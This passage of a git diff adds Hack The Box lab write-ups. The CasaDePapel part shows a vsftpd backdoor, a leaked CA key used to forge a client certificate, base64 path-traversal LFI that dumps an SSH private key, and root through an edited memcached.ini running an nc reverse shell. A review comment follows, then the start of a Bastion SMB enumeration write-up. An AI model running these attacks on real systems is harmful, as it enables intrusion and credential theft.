+ [*] 10.10.10.131:21 - Banner: 220 (vsFTPd 2.3.4)
+ [*] 10.10.10.131:21 - USER: 331 Please specify the password.
+ [*] Exploit completed, but no session was created.
+
+
+
+The exploit doesn't seem to work, Let's locate it, then copy it onto our local directory to examine it a little closer.
+
+
+ msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exit
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → mkdir CasaDePapel
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → cd CasaDePapel
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
+ → locate 17491
+ /opt/metasploit/vendor/bundle/ruby/2.6.0/gems/metasploit-credential-3.0.3/db/migrate/20140722174919_old_creds_to_new_creds.rb
+ /usr/share/exploitdb/exploits/unix/remote/17491.rb
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
+ → cp /usr/share/exploitdb/exploits/unix/remote/17491.rb .
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
+ → nano 17491.rb
+
+
+Looking at the code, we see that the exploit tries to connect to the 6200th port. Let's use telnet to see if we can connect to it manually.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/CasaDePapel ]
+ → telnet 10.10.10.131 6200
+ Trying 10.10.10.131...
+ Connected to 10.10.10.131.
+ Escape character is '^]'.
+ Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
+ ls
+ Variables: $tokyo
+ ls
+ Variables: $tokyo
+ whoami
+ PHP Warning: Use of undefined constant whoami - assumed 'whoami' (this will throw an Error in a future version of PHP) in phar://eval()'d code on line 1
+ help
+ help Show a list of commands. Type `help [foo]` for information about [foo]. Aliases: ?
+ ls List local, instance or class variables, methods and constants. Aliases: list, dir
+ dump Dump an object or primitive.
+ doc Read the documentation for an object, class, constant, method or property. Aliases: rtfm, man
+ show Show the code for an object, class, constant, method or property.
+ wtf Show the backtrace of the most recent exception. Aliases: last-exception, wtf?
+ whereami Show where you are in the code.
+ throw-up Throw an exception or error out of the Psy Shell.
+ timeit Profiles with a timer.
+ trace Show the current call stack.
+ buffer Show (or clear) the contents of the code input buffer. Aliases: buf
+ clear Clear the Psy Shell screen.
+ edit Open an external editor. Afterwards, get produced code in input buffer.
+ sudo Evaluate PHP code, bypassing visibility restrictions.
+ history Show the Psy Shell history. Aliases: hist
+ exit End the current session and return to caller. Aliases: quit, q
+ whereami
+
+ From phar:///usr/bin/psysh/src/functions.php:307:
+
+ 302| $config['colorMode'] = Configuration::COLOR_MODE_FORCED;
+ 303| } elseif ($input->getOption('no-color')) {
+ 304| $config['colorMode'] = Configuration::COLOR_MODE_DISABLED;
+ 305| }
+ 306|
+ > 307| $shell = new Shell(new Configuration($config));
+ 308|
+ 309|
+ 310| if ($usageException !== null || $input->getOption('help')) {
+ 311| if ($usageException !== null) {
+ 312| echo $usageException->getMessage() . PHP_EOL . PHP_EOL;
+
+ history
+ show $tokyo
+ > 2| class Tokyo {
+ 3| private function sign($caCert,$userCsr) {
+ 4| $caKey = file_get_contents('/home/nairobi/ca.key');
+ 5| $userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
+ 6| openssl_x509_export($userCert, $userCertOut);
+ 7| return $userCertOut;
+ 8| }
+ 9| }
+
+
+
+
+Interestingly enough, the 4th line seems to pass the contents of a file named ca.key into the $caKey variable. Let's see what the contents of the ca.key are ourselves.
+
+
+ file_get_contents('/home/nairobi/ca.key');
+ => """
+ -----BEGIN PRIVATE KEY-----\n
+ MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb\n
+ 7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/\n
+ 2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl\n
+ uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M\n
+ YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp\n
+ s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us\n
+ PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V\n
+ Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89\n
+ 1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ\n
+ /CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+\n
+ q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr\n
+ uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd\n
+ I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og\n
+ 7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE\n
+ G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn\n
+ sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH\n
+ CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y\n
+ sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI\n
+ ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2\n
+ zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/\n
+ ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC\n
+ 9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M\n
+ WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM\n
+ 7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR\n
+ aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc\n
+ 53udBEzjt3WPqYGkkDknVhjD\n
+ -----END PRIVATE KEY-----\n
+ """
+
+
+
+Seems like we have a private SSL key to work with ! let's save it locally as ca.key. Do not forget to remove the \n and the spaces at the beginning of the lines otherwise it won't be the exact same SSH key. Earlier on, our nmap scan picked up the 443rd port open running https, let's browse to it and see what we can work with.
+
+
+
+Seems like we need to provide a certificate. So let's first add the casadepapel.htb hostname to our /etc/hosts file.
+
+
+ 127.0.0.1 localhost
+ 127.0.1.1 Prometheus
+ 10.10.10.131 casadepapel.htb
+
+
+navigating over to https://10.10.10.131/ > connection > more information > security > view certificate > details > export and now we have the ca.key and ca.crt
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl pkey -in ca.key -pubout
+ -----BEGIN PUBLIC KEY-----
+ MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
+ 5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
+ 8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
+ hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
+ mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
+ D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
+ ZwIDAQAB
+ -----END PUBLIC KEY-----
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl x509 -in ca.crt -pubkey -noout
+ -----BEGIN PUBLIC KEY-----
+ MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/
+ 5vJpuaxJF3A5q2rVQJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e
+ 8DR9ksBQYyXqOZZ8/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsO
+ hl4+KB4cM4hNhE5B4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVz
+ mhlHVypqsfS9rKUVESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55Z
+ D66vQBSkN2PwBeiRPBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wM
+ ZwIDAQAB
+ -----END PUBLIC KEY-----
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl x509 -in ca.crt -pubkey -noout | grep md5sum
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl x509 -in ca.crt -pubkey -noout | md5sum
+ 71e2b2ca7b610c24d132e3e4c06daf0c -
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl pkey -in ca.key -pubout | md5sum
+ 71e2b2ca7b610c24d132e3e4c06daf0c -
+
+
+
+so here we see that the md5 hashes of both the public keys are the same, therefore it means that the public key is valid. From there, we need to generate a 4096 bit key and create a certificate signing request that we'll name client.csr
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl genrsa -out client.key 4096
+ Generating RSA private key, 4096 bit long modulus (2 primes)
+ ......................................................................++++
+ .............................................++++
+ e is 65537 (0x010001)
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → ls
+ ca.crt ca.key client.key
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl req -new -key client.key -out client.csr
+ You are about to be asked to enter information that will be incorporated
+ into your certificate request.
+ What you are about to enter is what is called a Distinguished Name or a DN.
+ There are quite a few fields but you can leave some blank
+ For some fields there will be a default value,
+ If you enter '.', the field will be left blank.
+ -----
+ Country Name (2 letter code) [AU]:US
+ State or Province Name (full name) [Some-State]:NY
+ Locality Name (eg, city) []:NYC
+ Organization Name (eg, company) [Internet Widgits Pty Ltd]:Marvel
+ Organizational Unit Name (eg, section) []:DC
+ Common Name (e.g. server FQDN or YOUR name) []:nihilist
+ Email Address []:nihilist@prometheus.com
+
+ Please enter the following 'extra' attributes
+ to be sent with your certificate request
+ A challenge password []:
+ An optional company name []:
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → ls
+ ca.crt ca.key client.csr client.key
+
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → ls
+ ca.crt ca.key client.csr client.key
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key -set_serial 9001 -extensions client -days 365 -outform PEM -out client.cer
+ Signature ok
+ subject=C = US, ST = NY, L = NYC, O = Marvel, OU = DC, CN = nihilist, emailAddress = nihilist@prometheus.com
+ Getting CA Private Key
+
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
+ Enter Export Password:
+ Verifying - Enter Export Password:
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → ls
+ ca.crt ca.key client.cer client.csr client.key client.p12
+
+
+    
+
+And we are in ! now we are able to enumerate the box further, from here we see that clicking on season1 then shows us a bunch of avi files to download, hovering over them, we see that their hyperlink is base64 encoded, and barely changing, so let's try getting some LFI.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → curl -sk https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E\=
+ -----BEGIN OPENSSH PRIVATE KEY-----
+ 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
+ -----END OPENSSH PRIVATE KEY-----
+
+
+Looks like we found a private key ! let's try logging in as one of the users :
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → curl -sk https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E\= > privatekey
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → chmod 600 privatekey
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → ssh -i privatekey professor@10.10.10.131
+ The authenticity of host '10.10.10.131 (10.10.10.131)' can't be established.
+ ECDSA key fingerprint is SHA256:rA99W+GVzo0hlABp1vMj9ChhjLwybPhHTpb65AWm7xI.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.131' (ECDSA) to the list of known hosts.
+
+ _ ____ ____ ____ _
+ | | __ _ / ___|__ _ ___ __ _ | _ \ ___ | _ \ __ _ _ __ ___| |
+ | | / _` | | | / _` / __|/ _` | | | | |/ _ \ | |_) / _` | '_ \ / _ \ |
+ | |__| (_| | | |__| (_| \__ \ (_| | | |_| | __/ | __/ (_| | |_) | __/ |
+ |_____\__,_| \____\__,_|___/\__,_| |____/ \___| |_| \__,_| .__/ \___|_|
+ |_|
+
+ lacasadepapel [~]$ whoami
+ professor
+
+ lacasadepapel [~]$ cd /home/professor && ls
+ memcached.ini memcached.js node_modules
+
+ lacasadepapel [~]$
+
+
+and we are logged in ! however we still need to escalate privileges to be able to print out the flags. printing out the file memcached.ini we see some kind of a command being run and the file itself is owned by root. changing it we should be able to privesc.
+
+_Terminal 1:_
+
+
+ lacasadepapel [~]$ which nc
+ /usr/bin/nc
+ lacasadepapel [~]$ vi memcached.ini
+
+
+
+ [program:memcached]
+ command = sudo -u root /usr/bin/nc 10.10.14.7 1234 -e /bin/bash
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → nc -lvnp 1234
+ listening on [any] 1234 ...
+ connect to [10.10.14.7] from (UNKNOWN) [10.10.10.131] 43309
+ python -c 'import pty;pty.spawn("/bin/bash");'
+ bash-4.4# whoami
+ whoami
+ root
+ cd /home
+ bash-4.4# ls
+ ls
+ berlin dali nairobi oslo professor
+ bash-4.4# cd berlin
+ cd berlin
+ bash-4.4# ls
+ ls
+ downloads node_modules server.js user.txt
+ bash-4.4# cat user.txt
+ cat user.txt
+ 4dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+and we are logged in as root ! all that's left to do is printing our flags.
+
+## **Part 3 : Getting Root Access**
+
+
+ bash-4.4# cat /root/root.txt
+ cat /root/root.txt
+ 58XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
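Review bot: the privilege-escalation step is asserted rather than shown. The paragraph beginning `and we are logged in !` says memcached.ini "runs some kind of a command" and "is owned by root", but the hunk never includes the `cat memcached.ini` output or an `ls -l memcached.ini` line, and the `[program:memcached]` block under `_Terminal 1:_` is already the edited version, so a reader cannot see the original command, verify the ownership claim, or learn which service re-reads the file after it is changed; include the original contents and the ownership listing and state what picks the change up. The `## **Part 3 : Getting Root Access**` heading is also misplaced: the root shell is already obtained in the `_Terminal 2:_` block under Part 2, so Part 3 contains only `cat /root/root.txt`; move the heading above `_Terminal 1:_`. Two smaller points: the `ls` listing `ca.crt ca.key client.csr client.key` is pasted twice in a row at the top of this region, and the comment field at the end of the recovered key (`YmVybGluQGxhY2FzYWRlcGFwZWwuaHRi`, which decodes to berlin@lacasadepapel.htb) suggests the key belongs to a different account, yet the login is attempted as `professor` with no explanation of why that user was chosen. Finally, `Here we can see the progress graph :` is followed by nothing; the image link is missing.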
diff --git a/Easy/31.md b/Easy/31.md
new file mode 100644
index 0000000..a2a89b0
--- /dev/null
+++ b/Easy/31.md
@@ -0,0 +1,758 @@
+# Bastion Writeup
+
+
+
+## Introduction :
+
+Bastion is an easy Windows Box that was released back in April 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 85.171.153.138 ] [ ~/_HTB/ ]
+ → nmap -F 10.10.10.134
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 18:20 CET
+ Nmap scan report for 10.10.10.134
+ Host is up (0.044s latency).
+ Not shown: 96 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 135/tcp open msrpc
+ 139/tcp open netbios-ssn
+ 445/tcp open microsoft-ds
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.45 seconds
+
+ λ nihilist [ 85.171.153.138 ] [ ~/_HTB/ ]
+ → nmap -sCV -p22,135,139,445 10.10.10.134
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 18:21 CET
+ Nmap scan report for 10.10.10.134
+ Host is up (0.059s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
+ | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
+ |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
+ Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: -19m28s, deviation: 34m37s, median: 30s
+ | smb-os-discovery:
+ | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
+ | Computer name: Bastion
+ | NetBIOS computer name: BASTION\x00
+ | Workgroup: WORKGROUP\x00
+ |_ System time: 2019-12-09T18:21:46+01:00
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2019-12-09T17:21:48
+ |_ start_date: 2019-12-09T16:05:13
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 18.74 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port the smbservice running on port 135, 139 and 445, let's see if we can enumerate it a little further :
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/] → smbclient -L //10.10.10.134/ -U ""
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\'s password:
+
+ Sharename Type Comment
+ --------- ---- -------
+ ADMIN$ Disk Remote Admin
+ Backups Disk
+ C$ Disk Default share
+ IPC$ IPC Remote IPC
+ Reconnecting with SMB1 for workgroup listing.
+ do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
+ Unable to connect with SMB1 -- no workgroup available
+
+
+
+We seem to have a few services we can work with : let's check out Backups first.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bastion ]
+ → smbclient //10.10.10.134/Backups
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\nihilist's password:
+ Try "help" to get a list of possible commands.
+ smb: \> ls
+ . D 0 Tue Apr 16 12:02:11 2019
+ .. D 0 Tue Apr 16 12:02:11 2019
+ note.txt AR 116 Tue Apr 16 12:10:09 2019
+ SDT65CB.tmp A 0 Fri Feb 22 13:43:08 2019
+ WindowsImageBackup D 0 Fri Feb 22 13:44:02 2019
+
+ 7735807 blocks of size 4096. 2747575 blocks available
+ smb: \> get note.txt
+ getting file \note.txt of size 116 as note.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
+
+
+Now that we saved the note.txt locally we print out it's contents
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bastion] → cat note.txt
+
+ Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
+
+
+Let's follow their advice and mount the share
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → mount -t cifs //10.10.10.134/Backups mount
+ Password for root@//10.10.10.134/Backups:
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → ls && cd mount
+ mount note.txt
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → ls
+ note.txt SDT65CB.tmp WindowsImageBackup
+
+
+
+
+We can also enumerate the smb share using smbmap as demonstrated below :
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → smbmap -u nihilist -H 10.10.10.134
+ [+] Finding open SMB ports....
+ [+] Guest SMB session established on 10.10.10.134...
+ [+] IP: 10.10.10.134:445 Name: 10.10.10.134
+ Disk Permissions Comment
+ ---- ----------- -------
+ ADMIN$ NO ACCESS Remote Admin
+ Backups READ, WRITE
+ [!] Unable to remove test directory at \\10.10.10.134\BackupsvXVtBOoZjY, please remove manually
+ C$ NO ACCESS Default share
+ .
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 InitShutdown
+ fr--r--r-- 4 Sun Dec 31 23:58:45 1600 lsass
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 ntsvcs
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 scerpc
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-2e4-0
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 epmapper
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-1cc-0
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 LSM_API_service
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 eventlog
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-378-0
